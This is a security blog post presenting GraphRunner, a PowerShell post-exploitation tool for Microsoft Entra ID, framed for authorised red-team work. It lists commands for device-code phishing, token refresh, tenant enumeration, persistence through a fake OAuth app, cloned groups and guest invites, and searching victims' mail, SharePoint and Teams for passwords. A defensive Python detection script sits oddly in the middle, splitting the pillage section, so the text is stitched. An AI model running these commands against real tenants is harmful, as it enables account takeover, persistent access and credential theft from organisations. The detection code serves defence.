Microsoft Entra ID (Azure AD) Penetration Test/Red Team Assessment All-in-One Tool
I have written about Microsoft Entra ID (Azure AD) penetration testing and red teaming before. In this blog post, I will describe a single tool that can be used as an all-in-one tool in Microsoft Entra ID (Azure AD) assessments. It has made my work on these tests much easier. Without further ado, let me introduce the tool.
The tool's name is GraphRunner.
In the past, I used AADInternals, RoadTools, and TokenTactics to access files in MS Teams, Outlook, and OneDrive during pentests and red teams. But sometimes, when switching between tokens, I would forget which token I was using and had a hard time remembering which phase I was in. This forced me to recreate tokens, which was noisier and created more logs on the target system.
Lately, I discovered the GraphRunner tool, developed by Black Hills Information Security, which made my work much easier. Although it is called a post-exploitation tool, I think it can be used from the beginning to the end of an assessment.
Creating a device code for phishing attacks can also be done through the tool. So let's start with an explanation of the tool and how it can be used.
First of all, the tool is a PowerShell module, so you need a Windows machine. You can create a Windows instance in the cloud for this. I mostly use cloud systems for these assessments, but you don't necessarily need one; you can work comfortably on your host too.
Download the tool from GitHub to your Windows machine and then import it in PowerShell:
Import-Module .\GraphRunner.ps1
The tool consists of several submodules. These are:
- Authentication,
- Recon & Enumeration Modules,
- Persistence Modules,
- Pillage Modules,
- Invoke-GraphRunner Module (More Automation),
- Supplemental Modules.
I only want to write about certain aspects of it, both to keep the blog post shorter and to cover the aspects I use myself. You can see and apply the other uses on the usage wiki page.
As with AADInternals, you need to get a device code from the Microsoft endpoint and deliver it to a user in scope (mostly via a phishing email, or, if phishing is not in scope, you can complete it with the test user). So that phase is Initial Access.
Get-GraphTokens
It will give you a device code that must be entered with a valid user account. After that, you will have a PRT token, which is important during your Penetration Test/Red Team Assessment.
During your assessment, your (victim) tokens will expire. To keep using and connecting to Entra ID, you should renew them. That can be done via Invoke-RefreshGraphTokens.
Invoke-RefreshGraphTokens
Here you should give the TenantID and your refresh token as input.
So now we are in the system and can stay as long as we want.
After that, you can do enumeration in the system. GraphRunner gives you lots of flexibility here; I have used some of its modules, and I will list them below.
Invoke-GraphRecon -Tokens $tokens -PermissionEnum
Invoke-DumpCAPS -Tokens $tokens -ResolveGuids
Invoke-DumpApps -Tokens $tokens
Get-AzureADUsers -Tokens $tokens -OutFile users.txt
Get-SecurityGroups -AccessToken $tokens.access_token
Get-UpdatableGroups -Tokens $tokens
Get-DynamicGroups -Tokens $tokens
Get-SharePointSiteURLs -Tokens $tokens
Invoke-GraphOpenInboxFinder -Tokens $tokens -Userlist users.txt
Get-TenantID -Domain <domain>
On that module, I have mostly used updatable-group enumeration, because it means I can add my victim user to these groups with its privileges and search for more passwords or secret files in those teams' chats, Outlook, and OneDrive files.
Next comes persistence in the system. Here you have some options: you can add guest users to the tenant, or you can add your victim user to some groups. It is also possible to create a clone group with the exact name of a security group and wait for a global admin to mistakenly grant extra privileges to the fake group.
The commands are:
Invoke-InjectOAuthApp -AppName "Win Defend for M365" -ReplyUrl "https://windefend.azurewebsites.net" -scope "openid","Mail.Read","email","profile","offline_access" -Tokens $tokens
Invoke-SecurityGroupCloner -Tokens $tokens
Invoke-InviteGuest -Tokens $tokens -DisplayName "Lord Voldemort" -EmailAddress "iamlordvoldemort@31337schoolofhackingandwizardry.com"
Invoke-AddGroupMember -Tokens $tokens -groupID e6a413c2-2aa4-4a80-9c16-88c1687f57d9 -userId 7a3d8bfe-e4c7-46c0-93ec-ef2b1c8a0b4a
Here I mostly use the Invoke-AddGroupMember and Invoke-InviteGuest commands. First I check for updatable groups with the victim's privileges, and then, if there are interesting groups I can be part of, I add my victim user to these groups and check those groups' privileges or other loot for the next steps.
After these, I go on to the Pillage module, where you can search the victim's mailbox, SharePoint and OneDrive files, and loot in Teams messages.
Commands that you can use here are:
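The device code sign-ins from the Initial Access phase and the group, guest and app changes from the persistence phase above all leave records in Entra ID logs, and a defender can flag them with a short script. This is an added example, not code from GraphRunner or from the post; it assumes log exports in the Microsoft Graph signIn/directoryAudit shape (with the authenticationProtocol and activityDisplayName fields), and all sample records are constructed.

```python
# activityDisplayName values are the ones Entra ID writes for these actions;
# pairing them with the GraphRunner commands is this example's assumption.
PERSISTENCE_ACTIVITIES = {
    "Add member to group": "member added to group (Invoke-AddGroupMember)",
    "Invite external user": "guest invited (Invoke-InviteGuest)",
    "Add service principal": "app registered (Invoke-InjectOAuthApp)",
    "Consent to application": "consent granted (Invoke-InjectOAuthApp)",
}

def flag_device_code_signins(signins):
    """Return (user, ip) for sign-ins that used the OAuth device code flow.
    The Graph signIn resource sets authenticationProtocol to 'deviceCode'
    for tokens obtained the way Get-GraphTokens does (assumed in export)."""
    return [(s["userPrincipalName"], s["ipAddress"])
            for s in signins if s.get("authenticationProtocol") == "deviceCode"]

def flag_persistence_events(audits):
    """Return (actor, first target resource, reason) for audit events
    whose activity matches the persistence table above."""
    hits = []
    for a in audits:
        reason = PERSISTENCE_ACTIVITIES.get(a.get("activityDisplayName"))
        if reason:
            actor = a["initiatedBy"]["user"]["userPrincipalName"]
            target = a["targetResources"][0]["displayName"]
            hits.append((actor, target, reason))
    return hits

# Constructed sample records (not real tenant data).
SIGNINS = [
    {"userPrincipalName": "deckard@example.com", "ipAddress": "203.0.113.5",
     "authenticationProtocol": "deviceCode", "appDisplayName": "Microsoft Office"},
    {"userPrincipalName": "rachael@example.com", "ipAddress": "198.51.100.9",
     "authenticationProtocol": "oAuth2", "appDisplayName": "Microsoft Teams"},
]
AUDITS = [
    {"activityDisplayName": "Add member to group",
     "initiatedBy": {"user": {"userPrincipalName": "deckard@example.com"}},
     "targetResources": [{"displayName": "Rick Deckard"}]},
    {"activityDisplayName": "Invite external user",
     "initiatedBy": {"user": {"userPrincipalName": "deckard@example.com"}},
     "targetResources": [{"displayName": "Lord Voldemort"}]},
    {"activityDisplayName": "Update user",
     "initiatedBy": {"user": {"userPrincipalName": "admin@example.com"}},
     "targetResources": [{"displayName": "Rachael"}]},
]
```

Correlating the two outputs by user (a device code sign-in followed shortly by group or guest changes from the same account) is the pattern worth alerting on.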
Invoke-SearchMailbox -Tokens $tokens -SearchTerm "password" -MessageCount 40
Invoke-SearchSharePointAndOneDrive -Tokens $tokens -SearchTerm 'password AND filetype:xlsx'
Invoke-ImmersiveFileReader -Tokens $tokens -SharePointDomain targetcompany.sharepoint.com -DriveID <drive ID> -FileID <FileID>
Invoke-SearchTeams -Tokens $tokens -SearchTerm "password" -ResultSize 100
Invoke-SearchUserAttributes -Tokens $tokens -SearchTerm "password"
Get-Inbox -Tokens $tokens -userid deckard@tyrellcorporation.io -TotalMessages 50 -OutFile emails.csv
Get-TeamsChat -Tokens $tokens
In this part, I want to give some attack paths that can be useful in your assessment.
I would like to thank dafthack and the Black Hills InfoSec team for that great tool.
You can follow me from here:
- https://github.com/mturhanlar
- https://github.com/mturhanlar/turme
- https://www.linkedin.com/in/melihturhanlar/